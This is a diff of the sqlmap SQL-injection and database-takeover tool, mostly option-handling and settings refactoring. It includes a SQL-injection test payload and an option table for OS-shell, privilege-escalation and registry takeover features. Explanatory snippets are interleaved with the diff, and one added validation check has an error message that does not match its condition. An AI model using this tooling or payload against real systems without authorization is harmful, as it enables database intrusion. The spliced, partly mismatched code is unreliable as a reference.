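    payload = module.tamper(payload)

print(payload)  # 1/**/AND/**/1=1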
@@ -1046,7 +887,7 @@ def _setSocketPreConnect():
 if conf.disablePrecon:
 return
 
-def _():
+def _thread():
 while kb.get("threadContinue") and not conf.get("disablePrecon"):
 try:
 for key in socket._ready:
@@ -1078,6 +919,7 @@ def _setSocketPreConnect():
 break
 else:
 try:
+candidate.shutdown(socket.SHUT_RDWR)
 candidate.close()
 except socket.error:
 pass
@@ -1090,7 +932,7 @@ def _setSocketPreConnect():
 socket.socket._connect = socket.socket.connect
 socket.socket.connect = connect
 
-thread = threading.Thread(target=_)
+thread = threading.Thread(target=_thread)
 setDaemon(thread)
 thread.start()
 
@@ -1127,7 +969,7 @@ def _setHTTPHandlers():
 _ = urlparse.urlsplit(conf.proxy)
 except Exception, ex:
 errMsg = "invalid proxy address '%s' ('%s')" % (conf.proxy, getSafeExString(ex))
-raise SqlmapSyntaxException, errMsg
+raise SqlmapSyntaxException(errMsg)
 
 hostnamePort = _.netloc.split(":")
 
@@ -1148,7 +990,7 @@ def _setHTTPHandlers():
 raise SqlmapSyntaxException(errMsg)
 
 if conf.proxyCred:
-_ = re.search("^(.*?):(.*?)$", conf.proxyCred)
+_ = re.search(r"\A(.*?):(.*?)\Z", conf.proxyCred)
 if not _:
 errMsg = "proxy authentication credentials "
 errMsg += "value must be in format username:password"
@@ -1254,9 +1096,9 @@ def _setSafeVisit():
 kb.safeReq.post = None
 else:
 errMsg = "invalid format of a safe request file"
-raise SqlmapSyntaxException, errMsg
+raise SqlmapSyntaxException(errMsg)
 else:
-if not re.search("^http[s]*://", conf.safeUrl):
+if not re.search(r"\Ahttp[s]*://", conf.safeUrl):
 if ":443/" in conf.safeUrl:
 conf.safeUrl = "https://" + conf.safeUrl
 else:
@@ -1376,7 +1218,7 @@ def _setHTTPAuthentication():
 except ImportError:
 errMsg = "sqlmap requires Python NTLM third-party library "
 errMsg += "in order to authenticate via NTLM, "
-errMsg += "http://code.google.com/p/python-ntlm/"
+errMsg += "https://github.com/mullender/python-ntlm"
 raise SqlmapMissingDependence(errMsg)
 
 authHandler = HTTPNtlmAuthHandler.HTTPNtlmAuthHandler(kb.passwordMgr)
@@ -1409,8 +1251,8 @@ def _setHTTPExtraHeaders():
 raise SqlmapSyntaxException(errMsg)
 
 elif not conf.requestFile and len(conf.httpHeaders or []) < 2:
-if conf.charset:
+if conf.encoding:
-conf.httpHeaders.append((HTTP_HEADER.ACCEPT_CHARSET, "%s;q=0.7,*;q=0.1" % conf.charset))
+conf.httpHeaders.append((HTTP_HEADER.ACCEPT_CHARSET, "%s;q=0.7,*;q=0.1" % conf.encoding))
 
 # Invalidating any caching mechanism in between
 # Reference: http://stackoverflow.com/a/1383359
@@ -1488,8 +1330,8 @@ def _setHTTPUserAgent():
 
 userAgent = random.sample(kb.userAgents or [_defaultHTTPUserAgent()], 1)[0]
 
-infoMsg = "fetched random HTTP User-Agent header from "
+infoMsg = "fetched random HTTP User-Agent header value '%s' from " % userAgent
-infoMsg += "file '%s': '%s'" % (paths.USER_AGENTS, userAgent)
+infoMsg += "file '%s'" % paths.USER_AGENTS
 logger.info(infoMsg)
 
 conf.httpHeaders.append((HTTP_HEADER.USER_AGENT, userAgent))
@@ -1579,12 +1421,12 @@ def _createTemporaryDirectory():
 except (OSError, IOError), ex:
 errMsg = "there has been a problem while accessing "
 errMsg += "temporary directory location(s) ('%s')" % getSafeExString(ex)
-raise SqlmapSystemException, errMsg
+raise SqlmapSystemException(errMsg)
 else:
 try:
 if not os.path.isdir(tempfile.gettempdir()):
 os.makedirs(tempfile.gettempdir())
-except (OSError, IOError, WindowsError), ex:
+except Exception, ex:
 warnMsg = "there has been a problem while accessing "
 warnMsg += "system's temporary directory location(s) ('%s'). Please " % getSafeExString(ex)
 warnMsg += "make sure that there is enough disk space left. If problem persists, "
@@ -1595,7 +1437,7 @@ def _createTemporaryDirectory():
 if "sqlmap" not in (tempfile.tempdir or "") or conf.tmpDir and tempfile.tempdir == conf.tmpDir:
 try:
 tempfile.tempdir = tempfile.mkdtemp(prefix="sqlmap", suffix=str(os.getpid()))
-except (OSError, IOError, WindowsError):
+except:
 tempfile.tempdir = os.path.join(paths.SQLMAP_HOME_PATH, "tmp", "sqlmap%s%d" % (randomStr(6), os.getpid()))
 
 kb.tempDir = tempfile.tempdir
@@ -1603,10 +1445,10 @@ def _createTemporaryDirectory():
 if not os.path.isdir(tempfile.tempdir):
 try:
 os.makedirs(tempfile.tempdir)
-except (OSError, IOError, WindowsError), ex:
+except Exception, ex:
 errMsg = "there has been a problem while setting "
 errMsg += "temporary directory location ('%s')" % getSafeExString(ex)
-raise SqlmapSystemException, errMsg
+raise SqlmapSystemException(errMsg)
 
 def _cleanupOptions():
 """
@@ -1647,7 +1489,10 @@ def _cleanupOptions():
 conf.rParam = []
 
 if conf.paramDel and '\\' in conf.paramDel:
-conf.paramDel = conf.paramDel.decode("string_escape")
+try:
+conf.paramDel = conf.paramDel.decode("string_escape")
+except ValueError:
+pass
 
 if conf.skip:
 conf.skip = conf.skip.replace(" ", "")
@@ -1661,6 +1506,9 @@ def _cleanupOptions():
 if conf.delay:
 conf.delay = float(conf.delay)
 
+if conf.url:
+conf.url = conf.url.strip()
+
 if conf.rFile:
 conf.rFile = ntToPosixSlashes(normalizePath(conf.rFile))
 
@@ -1696,12 +1544,21 @@ def _cleanupOptions():
 if conf.os:
 conf.os = conf.os.capitalize()
 
+if conf.forceDbms:
+conf.dbms = conf.forceDbms
+
 if conf.dbms:
-conf.dbms = conf.dbms.capitalize()
+kb.dbmsFilter = []
+for _ in conf.dbms.split(','):
+for dbms, aliases in DBMS_ALIASES:
+if _.strip().lower() in aliases:
+kb.dbmsFilter.append(dbms)
+conf.dbms = dbms if conf.dbms and ',' not in conf.dbms else None
+break
 
 if conf.testFilter:
 conf.testFilter = conf.testFilter.strip('*+')
-conf.testFilter = re.sub(r"([^.])([*+])", "\g<1>.\g<2>", conf.testFilter)
+conf.testFilter = re.sub(r"([^.])([*+])", r"\g<1>.\g<2>", conf.testFilter)
 
 try:
 re.compile(conf.testFilter)
@@ -1710,7 +1567,7 @@ def _cleanupOptions():
 
 if conf.testSkip:
 conf.testSkip = conf.testSkip.strip('*+')
-conf.testSkip = re.sub(r"([^.])([*+])", "\g<1>.\g<2>", conf.testSkip)
+conf.testSkip = re.sub(r"([^.])([*+])", r"\g<1>.\g<2>", conf.testSkip)
 
 try:
 re.compile(conf.testSkip)
@@ -1757,7 +1614,7 @@ def _cleanupOptions():
 conf.string = conf.string.replace(_.encode("string_escape"), _)
 
 if conf.getAll:
-map(lambda x: conf.__setitem__(x, True), WIZARD.ALL)
+map(lambda _: conf.__setitem__(_, True), WIZARD.ALL)
 
 if conf.noCast:
 for _ in DUMP_REPLACEMENTS.keys():
@@ -1772,8 +1629,8 @@ def _cleanupOptions():
 if conf.col:
 conf.col = re.sub(r"\s*,\s*", ',', conf.col)
 
-if conf.excludeCol:
+if conf.exclude:
-conf.excludeCol = re.sub(r"\s*,\s*", ',', conf.excludeCol)
+conf.exclude = re.sub(r"\s*,\s*", ',', conf.exclude)
 
 if conf.binaryFields:
 conf.binaryFields = re.sub(r"\s*,\s*", ',', conf.binaryFields)
@@ -1781,6 +1638,9 @@ def _cleanupOptions():
 if any((conf.proxy, conf.proxyFile, conf.tor)):
 conf.disablePrecon = True
 
+if conf.dummy:
+conf.batch = True
+
 threadData = getCurrentThreadData()
 threadData.reset()
 
@@ -1795,23 +1655,13 @@ def _cleanupEnvironment():
 if hasattr(socket, "_ready"):
 socket._ready.clear()
 
-def _dirtyPatches():
+def _purge():
 """
-Place for "dirty" Python related patches
+Safely removes (purges) sqlmap data directory.
 """
 
-httplib._MAXLINE = 1 * 1024 * 1024 # accept overly long result lines (e.g. SQLi results in HTTP header responses)
+if conf.purge:
+purge(paths.SQLMAP_HOME_PATH)
-
-if IS_WIN:
-from thirdparty.wininetpton import win_inet_pton # add support for inet_pton() on Windows OS
-
-def _purgeOutput():
-"""
-Safely removes (purges) output directory.
-"""
-
-if conf.purgeOutput:
-purge(paths.SQLMAP_OUTPUT_PATH)
 
 def _setConfAttributes():
 """
@@ -1877,6 +1727,7 @@ def _setKnowledgeBaseAttributes(flushAll=True):
 kb.cache.addrinfo = {}
 kb.cache.content = {}
 kb.cache.encoding = {}
+kb.cache.alphaBoundaries = None
 kb.cache.intBoundaries = None
 kb.cache.parsedDbms = {}
 kb.cache.regex = {}
@@ -1902,6 +1753,7 @@ def _setKnowledgeBaseAttributes(flushAll=True):
 
 # Active back-end DBMS fingerprint
 kb.dbms = None
+kb.dbmsFilter = []
 kb.dbmsVersion = [UNKNOWN_DBMS_VERSION]
 
 kb.delayCandidates = TIME_DELAY_CANDIDATES * [0]
@@ -1927,6 +1779,7 @@ def _setKnowledgeBaseAttributes(flushAll=True):
 kb.forcePartialUnion = False
 kb.forceWhere = None
 kb.futileUnion = None
+kb.heavilyDynamic = False
 kb.headersFp = {}
 kb.heuristicDbms = None
 kb.heuristicExtendedDbms = None
@@ -1998,6 +1851,7 @@ def _setKnowledgeBaseAttributes(flushAll=True):
 kb.rowXmlMode = False
 kb.safeCharEncode = False
 kb.safeReq = AttribDict()
+kb.secondReq = None
 kb.singleLogFlags = set()
 kb.skipSeqMatcher = False
 kb.reduceTests = None
@@ -2020,6 +1874,7 @@ def _setKnowledgeBaseAttributes(flushAll=True):
 kb.uChar = NULL
 kb.unionDuplicates = False
 kb.wafSpecificResponse = None
+kb.wizardMode = False
 kb.xpCmdshellAvailable = False
 
 if flushAll:
@@ -2087,11 +1942,11 @@ def _useWizardInterface():
 choice = readInput(message, default='1')
 
 if choice == '2':
-map(lambda x: conf.__setitem__(x, True), WIZARD.INTERMEDIATE)
+map(lambda _: conf.__setitem__(_, True), WIZARD.INTERMEDIATE)
 elif choice == '3':
-map(lambda x: conf.__setitem__(x, True), WIZARD.ALL)
+map(lambda _: conf.__setitem__(_, True), WIZARD.ALL)
 else:
-map(lambda x: conf.__setitem__(x, True), WIZARD.BASIC)
+map(lambda _: conf.__setitem__(_, True), WIZARD.BASIC)
 
 logger.debug("muting sqlmap.. it will do the magic for you")
 conf.verbose = 0
@@ -2101,6 +1956,8 @@ def _useWizardInterface():
 
 dataToStdout("\nsqlmap is running, please wait..\n\n")
 
+kb.wizardMode = True
+
 def _saveConfig():
 """
 Saves the command line options to a sqlmap configuration INI file
@@ -2295,7 +2152,6 @@ def _setTorHttpProxySettings():
 errMsg = "can't establish connection with the Tor HTTP proxy. "
 errMsg += "Please make sure that you have Tor (bundle) installed and setup "
 errMsg += "so you could be able to successfully use switch '--tor' "
-
 raise SqlmapConnectionException(errMsg)
 
 if not conf.checkTor:
@@ -2316,7 +2172,6 @@ def _setTorSocksProxySettings():
 errMsg = "can't establish connection with the Tor SOCKS proxy. "
 errMsg += "Please make sure that you have Tor service installed and setup "
 errMsg += "so you could be able to successfully use switch '--tor' "
-
 raise SqlmapConnectionException(errMsg)
 
 # SOCKS5 to prevent DNS leaks (http://en.wikipedia.org/wiki/Tor_%28anonymity_network%29)
@@ -2329,7 +2184,7 @@ def _checkWebSocket():
 from websocket import ABNF
 except ImportError:
 errMsg = "sqlmap requires third-party module 'websocket-client' "
-errMsg += "in order to use WebSocket funcionality"
+errMsg += "in order to use WebSocket functionality"
 raise SqlmapMissingDependence(errMsg)
 
 def _checkTor():
@@ -2370,8 +2225,8 @@ def _basicOptionValidation():
 
 if isinstance(conf.limitStart, int) and conf.limitStart > 0 and \
 isinstance(conf.limitStop, int) and conf.limitStop < conf.limitStart:
-errMsg = "value for option '--start' (limitStart) must be smaller or equal than value for --stop (limitStop) option"
+warnMsg = "usage of option '--start' (limitStart) which is bigger than value for --stop (limitStop) option is considered unstable"
-raise SqlmapSyntaxException(errMsg)
+logger.warn(warnMsg)
 
 if isinstance(conf.firstChar, int) and conf.firstChar > 0 and \
 isinstance(conf.lastChar, int) and conf.lastChar < conf.firstChar:
@@ -2386,6 +2241,10 @@ def _basicOptionValidation():
 errMsg = "switch '--eta' is incompatible with option '-v'"
 raise SqlmapSyntaxException(errMsg)
 
+if conf.secondUrl and conf.secondReq:
+errMsg = "option '--second-url' is incompatible with option '--second-req')"
+raise SqlmapSyntaxException(errMsg)
+
 if conf.direct and conf.url:
 errMsg = "option '-d' is incompatible with option '-u' ('--url')"
 raise SqlmapSyntaxException(errMsg)
@@ -2418,6 +2277,10 @@ def _basicOptionValidation():
 errMsg = "option '--not-string' is incompatible with switch '--null-connection'"
 raise SqlmapSyntaxException(errMsg)
 
+if conf.notString and conf.nullConnection:
+errMsg = "option '--tor' is incompatible with switch '--os-pwn'"
+raise SqlmapSyntaxException(errMsg)
+
 if conf.noCast and conf.hexConvert:
 errMsg = "switch '--no-cast' is incompatible with switch '--hex'"
 raise SqlmapSyntaxException(errMsg)
@@ -2517,11 +2380,11 @@ def _basicOptionValidation():
|
|||||||
raise SqlmapSyntaxException(errMsg)
|
raise SqlmapSyntaxException(errMsg)
|
||||||
|
|
||||||
if conf.checkTor and not any((conf.tor, conf.proxy)):
|
if conf.checkTor and not any((conf.tor, conf.proxy)):
|
||||||
errMsg = "switch '--check-tor' requires usage of switch '--tor' (or option '--proxy' with HTTP proxy address using Tor)"
|
errMsg = "switch '--check-tor' requires usage of switch '--tor' (or option '--proxy' with HTTP proxy address of Tor service)"
|
||||||
raise SqlmapSyntaxException(errMsg)
|
raise SqlmapSyntaxException(errMsg)
|
||||||
|
|
||||||
if conf.torPort is not None and not (isinstance(conf.torPort, int) and conf.torPort >= 0 and conf.torPort <= 65535):
|
if conf.torPort is not None and not (isinstance(conf.torPort, int) and conf.torPort >= 0 and conf.torPort <= 65535):
|
||||||
errMsg = "value for option '--tor-port' must be in range 0-65535"
|
errMsg = "value for option '--tor-port' must be in range [0, 65535]"
|
||||||
raise SqlmapSyntaxException(errMsg)
|
raise SqlmapSyntaxException(errMsg)
|
||||||
|
|
||||||
if conf.torType not in getPublicTypeMembers(PROXY_TYPE, True):
|
if conf.torType not in getPublicTypeMembers(PROXY_TYPE, True):
|
||||||
@@ -2563,15 +2426,15 @@ def _basicOptionValidation():
|
|||||||
errMsg += "format <username>:<password> (e.g. \"root:pass\")"
|
errMsg += "format <username>:<password> (e.g. \"root:pass\")"
|
||||||
raise SqlmapSyntaxException(errMsg)
|
raise SqlmapSyntaxException(errMsg)
|
||||||
|
|
||||||
if conf.charset:
|
if conf.encoding:
|
||||||
_ = checkCharEncoding(conf.charset, False)
|
_ = checkCharEncoding(conf.encoding, False)
|
||||||
if _ is None:
|
if _ is None:
|
||||||
errMsg = "unknown charset '%s'. Please visit " % conf.charset
|
errMsg = "unknown encoding '%s'. Please visit " % conf.encoding
|
||||||
errMsg += "'%s' to get the full list of " % CODECS_LIST_PAGE
|
errMsg += "'%s' to get the full list of " % CODECS_LIST_PAGE
|
||||||
errMsg += "supported charsets"
|
errMsg += "supported encodings"
|
||||||
raise SqlmapSyntaxException(errMsg)
|
raise SqlmapSyntaxException(errMsg)
|
||||||
else:
|
else:
|
||||||
conf.charset = _
|
conf.encoding = _
|
||||||
|
|
||||||
if conf.loadCookies:
|
if conf.loadCookies:
|
||||||
if not os.path.exists(conf.loadCookies):
|
if not os.path.exists(conf.loadCookies):
|
||||||
@@ -2604,8 +2467,7 @@ def init():
|
|||||||
_setRequestFromFile()
|
_setRequestFromFile()
|
||||||
_cleanupOptions()
|
_cleanupOptions()
|
||||||
_cleanupEnvironment()
|
_cleanupEnvironment()
|
||||||
_dirtyPatches()
|
_purge()
|
||||||
_purgeOutput()
|
|
||||||
_checkDependencies()
|
_checkDependencies()
|
||||||
_createTemporaryDirectory()
|
_createTemporaryDirectory()
|
||||||
_basicOptionValidation()
|
_basicOptionValidation()
|
||||||
@@ -2614,6 +2476,7 @@ def init():
|
|||||||
_setDNSServer()
|
_setDNSServer()
|
||||||
_adjustLoggingFormatter()
|
_adjustLoggingFormatter()
|
||||||
_setMultipleTargets()
|
_setMultipleTargets()
|
||||||
|
_listTamperingFunctions()
|
||||||
_setTamperingFunctions()
|
_setTamperingFunctions()
|
||||||
_setWafFunctions()
|
_setWafFunctions()
|
||||||
_setTrafficOutputFP()
|
_setTrafficOutputFP()
|
||||||
|
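Side note on the charset-to-encoding rename in _basicOptionValidation() above: the value passed with '--encoding' still has to resolve to a known Python codec, otherwise the "unknown encoding" error is raised. A rough standalone illustration of that lookup using only the standard library (this is not sqlmap's checkCharEncoding() helper):

import codecs

def known_encoding(name):
    # returns the normalized codec name, or None when the codec does not exist
    try:
        return codecs.lookup(name).name
    except LookupError:
        return None

print(known_encoding("UTF8"))    # "utf-8"
print(known_encoding("utf-66"))  # None, which would trigger the error above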
@@ -1,254 +1,259 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
-See the file 'doc/COPYING' for copying permission
+Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+See the file 'LICENSE' for copying permission
 """

 optDict = {
-    # Format:
-    # Family: { "parameter name": "parameter datatype" },
-    # Or:
-    # Family: { "parameter name": ("parameter datatype", "category name used for common outputs feature") },
+    # Family: {"parameter name": "parameter datatype"},
+    # --OR--
+    # Family: {"parameter name": ("parameter datatype", "category name used for common outputs feature")},
+
     "Target": {
         "direct": "string",
         "url": "string",
         "logFile": "string",
         "bulkFile": "string",
         "requestFile": "string",
         "sessionFile": "string",
         "googleDork": "string",
         "configFile": "string",
         "sitemapUrl": "string",
     },

     "Request": {
         "method": "string",
         "data": "string",
         "paramDel": "string",
         "cookie": "string",
         "cookieDel": "string",
         "loadCookies": "string",
         "dropSetCookie": "boolean",
         "agent": "string",
         "randomAgent": "boolean",
         "host": "string",
         "referer": "string",
         "headers": "string",
         "authType": "string",
         "authCred": "string",
         "authFile": "string",
-        "ignore401": "boolean",
+        "ignoreCode": "integer",
         "ignoreProxy": "boolean",
         "ignoreRedirects": "boolean",
         "ignoreTimeouts": "boolean",
         "proxy": "string",
         "proxyCred": "string",
         "proxyFile": "string",
         "tor": "boolean",
         "torPort": "integer",
         "torType": "string",
         "checkTor": "boolean",
         "delay": "float",
         "timeout": "float",
         "retries": "integer",
         "rParam": "string",
         "safeUrl": "string",
         "safePost": "string",
         "safeReqFile": "string",
         "safeFreq": "integer",
         "skipUrlEncode": "boolean",
         "csrfToken": "string",
         "csrfUrl": "string",
         "forceSSL": "boolean",
         "hpp": "boolean",
         "evalCode": "string",
     },

     "Optimization": {
         "optimize": "boolean",
         "predictOutput": "boolean",
         "keepAlive": "boolean",
         "nullConnection": "boolean",
         "threads": "integer",
     },

     "Injection": {
         "testParameter": "string",
         "skip": "string",
         "skipStatic": "boolean",
         "paramExclude": "string",
         "dbms": "string",
         "dbmsCred": "string",
         "os": "string",
         "invalidBignum": "boolean",
         "invalidLogical": "boolean",
         "invalidString": "boolean",
         "noCast": "boolean",
         "noEscape": "boolean",
         "prefix": "string",
         "suffix": "string",
         "tamper": "string",
     },

     "Detection": {
         "level": "integer",
         "risk": "integer",
         "string": "string",
         "notString": "string",
         "regexp": "string",
         "code": "integer",
         "textOnly": "boolean",
         "titles": "boolean",
     },

     "Techniques": {
         "tech": "string",
         "timeSec": "integer",
         "uCols": "string",
         "uChar": "string",
         "uFrom": "string",
         "dnsDomain": "string",
-        "secondOrder": "string",
+        "secondUrl": "string",
+        "secondReq": "string",
     },

     "Fingerprint": {
         "extensiveFp": "boolean",
     },

     "Enumeration": {
         "getAll": "boolean",
         "getBanner": ("boolean", "Banners"),
         "getCurrentUser": ("boolean", "Users"),
         "getCurrentDb": ("boolean", "Databases"),
         "getHostname": "boolean",
         "isDba": "boolean",
         "getUsers": ("boolean", "Users"),
         "getPasswordHashes": ("boolean", "Passwords"),
         "getPrivileges": ("boolean", "Privileges"),
         "getRoles": ("boolean", "Roles"),
         "getDbs": ("boolean", "Databases"),
         "getTables": ("boolean", "Tables"),
         "getColumns": ("boolean", "Columns"),
         "getSchema": "boolean",
         "getCount": "boolean",
         "dumpTable": "boolean",
         "dumpAll": "boolean",
         "search": "boolean",
         "getComments": "boolean",
         "db": "string",
         "tbl": "string",
         "col": "string",
-        "excludeCol": "string",
+        "exclude": "string",
         "pivotColumn": "string",
         "dumpWhere": "string",
         "user": "string",
         "excludeSysDbs": "boolean",
         "limitStart": "integer",
         "limitStop": "integer",
         "firstChar": "integer",
         "lastChar": "integer",
         "query": "string",
         "sqlShell": "boolean",
         "sqlFile": "string",
     },

     "Brute": {
         "commonTables": "boolean",
         "commonColumns": "boolean",
     },

     "User-defined function": {
         "udfInject": "boolean",
         "shLib": "string",
     },

     "File system": {
         "rFile": "string",
         "wFile": "string",
         "dFile": "string",
     },

     "Takeover": {
         "osCmd": "string",
         "osShell": "boolean",
         "osPwn": "boolean",
         "osSmb": "boolean",
         "osBof": "boolean",
         "privEsc": "boolean",
         "msfPath": "string",
         "tmpPath": "string",
     },

     "Windows": {
         "regRead": "boolean",
         "regAdd": "boolean",
         "regDel": "boolean",
         "regKey": "string",
         "regVal": "string",
         "regData": "string",
         "regType": "string",
     },

     "General": {
-        #"xmlFile": "string",
+        # "xmlFile": "string",
         "trafficFile": "string",
         "batch": "boolean",
         "binaryFields": "string",
         "charset": "string",
         "checkInternet": "boolean",
         "crawlDepth": "integer",
         "crawlExclude": "string",
         "csvDel": "string",
         "dumpFormat": "string",
+        "encoding": "string",
         "eta": "boolean",
         "flushSession": "boolean",
         "forms": "boolean",
         "freshQueries": "boolean",
         "harFile": "string",
         "hexConvert": "boolean",
         "outputDir": "string",
         "parseErrors": "boolean",
         "saveConfig": "string",
         "scope": "string",
         "testFilter": "string",
         "testSkip": "string",
         "updateAll": "boolean",
     },

     "Miscellaneous": {
         "alert": "string",
         "answers": "string",
         "beep": "boolean",
         "cleanup": "boolean",
         "dependencies": "boolean",
         "disableColoring": "boolean",
         "googlePage": "integer",
         "identifyWaf": "boolean",
+        "listTampers": "boolean",
         "mobile": "boolean",
         "offline": "boolean",
-        "purgeOutput": "boolean",
+        "purge": "boolean",
         "skipWaf": "boolean",
         "smart": "boolean",
         "tmpDir": "string",
         "webRoot": "string",
         "wizard": "boolean",
         "verbose": "integer",
     },
+
     "Hidden": {
         "dummy": "boolean",
         "disablePrecon": "boolean",
         "profile": "boolean",
         "forceDns": "boolean",
         "murphyRate": "integer",
         "smokeTest": "boolean",
         "liveTest": "boolean",
         "stopFail": "boolean",
         "runCase": "string",
     },
+
     "API": {
         "api": "boolean",
         "taskid": "string",
         "database": "string",
     }
 }
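The datatype strings kept in optDict are what drives casting of values merged from the command line and the configuration file. A small hypothetical helper, sketched here only to show the idea (cast_option() is not part of sqlmap):

def cast_option(family, name, raw, opt_dict):
    datatype = opt_dict[family][name]
    if isinstance(datatype, tuple):  # e.g. ("boolean", "Banners")
        datatype = datatype[0]
    if datatype == "integer":
        return int(raw)
    if datatype == "float":
        return float(raw)
    if datatype == "boolean":
        return raw.strip().lower() in ("1", "true", "yes")
    return raw  # plain "string"

cast_option("Request", "torPort", "9050", optDict)   # 9050
cast_option("Detection", "level", "3", optDict)      # 3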
 26  lib/core/patch.py  Normal file
@@ -0,0 +1,26 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+See the file 'LICENSE' for copying permission
+"""
+
+import codecs
+import httplib
+
+from lib.core.settings import IS_WIN
+
+def dirtyPatches():
+    """
+    Place for "dirty" Python related patches
+    """
+
+    # accept overly long result lines (e.g. SQLi results in HTTP header responses)
+    httplib._MAXLINE = 1 * 1024 * 1024
+
+    # add support for inet_pton() on Windows OS
+    if IS_WIN:
+        from thirdparty.wininetpton import win_inet_pton
+
+    # Reference: https://github.com/nodejs/node/issues/12786#issuecomment-298652440
+    codecs.register(lambda name: codecs.lookup("utf-8") if name == "cp65001" else None)
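The last line of the new dirtyPatches() registers a codec alias so that the Windows console code page name "cp65001" resolves to UTF-8, which older Python 2 builds do not know about. The same trick in isolation:

import codecs

# without the register() call, .encode("cp65001") raises LookupError on such builds
codecs.register(lambda name: codecs.lookup("utf-8") if name == "cp65001" else None)
print("foobar".encode("cp65001"))  # encoded via UTF-8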
@@ -1,8 +1,8 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
-See the file 'doc/COPYING' for copying permission
+Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+See the file 'LICENSE' for copying permission
 """

 import codecs
@@ -20,9 +20,9 @@ def profile(profileOutputFile=None, dotOutputFile=None, imageOutputFile=None):
     """

     try:
+        __import__("gobject")
         from thirdparty.gprof2dot import gprof2dot
         from thirdparty.xdot import xdot
-        import gobject
         import gtk
         import pydot
     except ImportError, e:
@@ -50,7 +50,7 @@ def profile(profileOutputFile=None, dotOutputFile=None, imageOutputFile=None):
     if os.path.exists(imageOutputFile):
         os.remove(imageOutputFile)

-    infoMsg = "profiling the execution into file %s" % profileOutputFile
+    infoMsg = "profiling the execution into file '%s'" % profileOutputFile
     logger.info(infoMsg)

     # Start sqlmap main function and generate a raw profile file
@@ -80,15 +80,20 @@ def profile(profileOutputFile=None, dotOutputFile=None, imageOutputFile=None):
     if isinstance(pydotGraph, list):
         pydotGraph = pydotGraph[0]

-    pydotGraph.write_png(imageOutputFile)
-
-    infoMsg = "displaying interactive graph with xdot library"
-    logger.info(infoMsg)
-
-    # Display interactive Graphviz dot file by using extra/xdot/xdot.py
-    # http://code.google.com/p/jrfonseca/wiki/XDot
-    win = xdot.DotWindow()
-    win.connect('destroy', gtk.main_quit)
-    win.set_filter("dot")
-    win.open_file(dotOutputFile)
-    gtk.main()
+    try:
+        pydotGraph.write_png(imageOutputFile)
+    except OSError:
+        errMsg = "profiling requires graphviz installed "
+        errMsg += "(Hint: 'sudo apt-get install graphviz')"
+        logger.error(errMsg)
+    else:
+        infoMsg = "displaying interactive graph with xdot library"
+        logger.info(infoMsg)
+
+        # Display interactive Graphviz dot file by using extra/xdot/xdot.py
+        # http://code.google.com/p/jrfonseca/wiki/XDot
+        win = xdot.DotWindow()
+        win.connect('destroy', gtk.main_quit)
+        win.set_filter("dot")
+        win.open_file(dotOutputFile)
+        gtk.main()
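The try/except added around write_png() above matters because pydot only builds the DOT description; rendering shells out to the Graphviz binaries, so a missing 'dot' executable only fails at call time. A minimal reproduction of that failure mode (assumes the pydot package is importable; the output file name is arbitrary, and depending on the pydot version the error may surface as OSError or as pydot's own exception):

import pydot

graph = pydot.Dot(graph_type="digraph")
graph.add_edge(pydot.Edge("sqlmap", "profile"))
try:
    graph.write_png("profile.png")
except OSError:
    print("Graphviz binaries missing (hint: 'sudo apt-get install graphviz')")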
@@ -1,8 +1,8 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
-See the file 'doc/COPYING' for copying permission
+Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+See the file 'LICENSE' for copying permission
 """

 from lib.core.data import logger
@@ -14,11 +14,11 @@ _readline = None
 try:
     from readline import *
     import readline as _readline
-except ImportError:
+except:
     try:
         from pyreadline import *
         import pyreadline as _readline
-    except ImportError:
+    except:
         pass

 if IS_WIN and _readline:
@@ -1,8 +1,8 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
-See the file 'doc/COPYING' for copying permission
+Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+See the file 'LICENSE' for copying permission
 """

 import sqlite3
@@ -1,8 +1,8 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
-See the file 'doc/COPYING' for copying permission
+Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+See the file 'LICENSE' for copying permission
 """

 import os
@@ -1,8 +1,8 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
-See the file 'doc/COPYING' for copying permission
+Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+See the file 'LICENSE' for copying permission
 """

 import re
 80  lib/core/settings.py  Executable file → Normal file
@@ -1,8 +1,8 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
-See the file 'doc/COPYING' for copying permission
+Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+See the file 'LICENSE' for copying permission
 """

 import os
@@ -19,15 +19,17 @@ from lib.core.enums import DBMS_DIRECTORY_NAME
 from lib.core.enums import OS

 # sqlmap version (<major>.<minor>.<month>.<monthly commit>)
-VERSION = "1.1.8.0"
+VERSION = "1.2.8.0"
 TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
 TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
 VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
 DESCRIPTION = "automatic SQL injection and database takeover tool"
 SITE = "http://sqlmap.org"
+DEV_EMAIL_ADDRESS = "dev@sqlmap.org"
 ISSUES_PAGE = "https://github.com/sqlmapproject/sqlmap/issues/new"
-GIT_REPOSITORY = "git://github.com/sqlmapproject/sqlmap.git"
+GIT_REPOSITORY = "https://github.com/sqlmapproject/sqlmap.git"
 GIT_PAGE = "https://github.com/sqlmapproject/sqlmap"
+ZIPBALL_PAGE = "https://github.com/sqlmapproject/sqlmap/zipball/master"

 # colorful banner
 BANNER = """\033[01;33m\
@@ -63,26 +65,31 @@ URI_QUESTION_MARKER = "__QUESTION_MARK__"
 ASTERISK_MARKER = "__ASTERISK_MARK__"
